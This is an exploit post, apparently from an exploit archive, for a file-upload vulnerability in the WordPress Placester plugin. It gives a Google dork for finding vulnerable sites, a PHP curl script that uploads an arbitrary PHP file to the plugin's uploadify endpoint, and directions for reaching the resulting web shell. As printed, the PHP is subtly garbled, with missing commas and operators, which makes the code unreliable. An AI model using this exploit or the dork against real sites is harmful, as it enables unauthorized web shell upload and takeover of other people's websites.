facebook facebook twitter rss

wordpress placester plugin file upload vulnerability

Author: Tunisian spl01t3r , Published: 11-06-2012
+----------------------------------------------------------------------+
# Exploit Title: wordpress placester plugin file upload vulnerability
# Google Dork: inurl:/wp-content/plugins/placester/
# Date: 11/06/2012
# Author: Tunisian spl01t3r
# Software Link: http://downloads.wordpress.org/plugin/placester.zip

____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+

[+] exploit

<?php
/* example of using 
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="Tunisia.php";
$ch =
curl_init("http://[server]/[path]/wp-content/plugins/placester/js/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'fileToUpload'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>


[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
TN> http://[SERVER]/[path]/wp-content/uploads/placester/[file].php
Filename : $postResult output

+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ;
hassen ben mbarek ; prince bibou ; hag whag ; anis van toets
Safoine sassi ; DR.hsm ; HAMdi matador....
& all tn_spl01t3r's freinds
mAhna mAhna

[+] profile : www.facebook.com/TN.spl0it3r

+----------------------------------------------------------------------+

Like us on Facebook :